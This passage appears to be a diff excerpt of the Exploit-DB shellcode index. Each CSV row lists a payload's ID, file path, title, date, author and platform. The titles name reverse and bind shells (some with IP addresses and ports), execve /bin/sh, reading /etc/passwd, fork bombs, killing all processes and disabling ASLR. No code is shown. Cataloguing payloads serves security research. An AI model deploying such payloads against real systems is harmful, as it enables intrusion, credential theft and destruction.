41581,shellcodes/win_x86/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",shellcode,win_x86
|
||||||
|
41630,shellcodes/lin_x86/41630.asm,"Linux/x86 - exceve /bin/sh Encoded Shellcode (44 Bytes)",2017-03-17,WangYihang,shellcode,lin_x86
|
||||||
|
41631,shellcodes/lin_x86/41631.c,"Linux/x86 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",shellcode,lin_x86
|
||||||
|
41635,shellcodes/lin_x86/41635.txt,"Linux/x86 - Read /etc/passwd Shellcode (54 Bytes)",2017-03-19,WangYihang,shellcode,lin_x86
|
||||||
|
42295,shellcodes/lin_x86/42295.c,"Linux/x86 - Reverse TCP Shell (127.1.1.1:11111/TCP) Null-Free Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,lin_x86
|
||||||
|
41723,shellcodes/lin_x86/41723.c,"Linux/x86 - Reverse TCP /bin/bash Shell (192.168.3.119:54321/TCP) Shellcode (110 bytes)",2017-03-24,JR0ch17,shellcode,lin_x86
|
||||||
|
41750,shellcodes/lin_x86-64/41750.txt,"Linux/x86-64 - execve /bin/sh Shellcode (21 Bytes)",2017-03-28,WangYihang,shellcode,lin_x86-64
|
||||||
|
41757,shellcodes/lin_x86/41757.txt,"Linux/x86 - execve /bin/sh Shellcode (21 bytes)",2017-03-29,WangYihang,shellcode,lin_x86
|
||||||
|
41827,shellcodes/win_x86-64/41827.txt,"Windows 10 x64 - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",shellcode,win_x86-64
|
||||||
|
41883,shellcodes/lin_x86-64/41883.txt,"Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (2)",2017-04-13,WangYihang,shellcode,lin_x86-64
|
||||||
|
41909,shellcodes/lin_x86/41909.c,"Linux/x86 - Egghunter Shellcode (18 bytes)",2017-04-22,phackt_ul,shellcode,lin_x86
|
||||||
|
41969,shellcodes/lin_x86/41969.c,"Linux/x86 - Disable ASLR Security Shellcode (80 bytes)",2017-05-08,abatchy17,shellcode,lin_x86
|
||||||
|
41970,shellcodes/lin_x86-64/41970.asm,"Linux/x86-64 - Reverse TCP Shell (::1:1472/TCP) (IPv6) Null-Free Shellcode (113 bytes)",2017-05-08,Srakai,shellcode,lin_x86-64
|
||||||
|
42016,shellcodes/windows/42016.asm,"Windows x86/x64 - cmd.exe Shellcode (718 bytes)",2017-05-17,"Filippo Bersani",shellcode,windows
|
||||||
|
42126,shellcodes/lin_x86-64/42126.c,"Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (1)",2017-06-05,"Touhid M.Shaikh",shellcode,lin_x86-64
|
||||||
|
42177,shellcodes/lin_x86/42177.c,"Linux/x86 - execve /bin/sh + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes)",2017-06-15,nullparasite,shellcode,lin_x86
|
||||||
|
42179,shellcodes/lin_x86-64/42179.c,"Linux/x86-64 - execve /bin/sh Shellcode (24 bytes)",2017-06-15,m4n3dw0lf,shellcode,lin_x86-64
|
||||||
|
42208,shellcodes/lin_x86/42208.nasm,"Linux/x86 - Reverse UDP /bin/sh Shell (127.0.0.1:53/UDP) Shellcode (668 bytes)",2017-06-20,"DONTON Fetenat C",shellcode,lin_x86
|
||||||
|
42254,shellcodes/lin_x86/42254.c,"Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (75 bytes)",2017-06-26,wetw0rk,shellcode,lin_x86
|
||||||
|
42339,shellcodes/lin_x86-64/42339.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.8:4444/TCP) Shellcode (104 bytes)",2017-07-19,m4n3dw0lf,shellcode,lin_x86-64
|
||||||
|
42428,shellcodes/lin_x86/42428.c,"Linux x86 - execve /bin/sh Shellcode (24 bytes)",2017-08-06,"Touhid M.Shaikh",shellcode,lin_x86
|
||||||
|
42485,shellcodes/lin_x86-64/42485.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.2:4444/TCP) Shellcode (153 bytes)",2017-08-17,"Touhid M.Shaikh",shellcode,lin_x86-64
|
||||||
|
42522,shellcodes/lin_x86-64/42522.c,"Linux/x86-64 - Kill All Processes Shellcode (19 bytes)",2017-08-19,"Touhid M.Shaikh",shellcode,lin_x86-64
|
||||||
|
42523,shellcodes/lin_x86-64/42523.c,"Linux/x86-64 - Fork Bomb Shellcode (11 bytes)",2017-08-19,"Touhid M.Shaikh",shellcode,lin_x86-64
|
||||||
|
42594,shellcodes/lin_x86/42594.c,"Linux/x86 - Fork Bomb Shellcode (9 bytes)",2017-08-30,"Touhid M.Shaikh",shellcode,lin_x86
|
||||||
|
42646,shellcodes/arm/42646.c,"Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (192 bytes)",2017-09-10,"Andrea Sindoni",shellcode,arm
|
||||||
|
42647,shellcodes/arm/42647.c,"Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (192.168.0.12:4444/TCP) Shellcode (160 bytes)",2017-09-10,"Andrea Sindoni",shellcode,arm
|
||||||
|
42791,shellcodes/lin_x86-64/42791.c,"Linux/x86-64 - mkdir() 'evil' Shellcode (30 bytes)",2017-09-25,"Touhid M.Shaikh",shellcode,lin_x86-64
|
||||||
|
42977,shellcodes/lin_x86/42977.c,"Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (30 bytes)",2017-10-12,"Manuel Mancera",shellcode,lin_x86
|
||||||
|
42992,shellcodes/win_x86-64/42992.c,"Windows x64 - API Hooking Shellcode (117 bytes)",2017-10-16,"Roziul Hasan Khan Shifat",shellcode,win_x86-64
|
|
0
searchsploit
Normal file → Executable file
0
searchsploit
Normal file → Executable file
Loading…
Add table
Reference in a new issue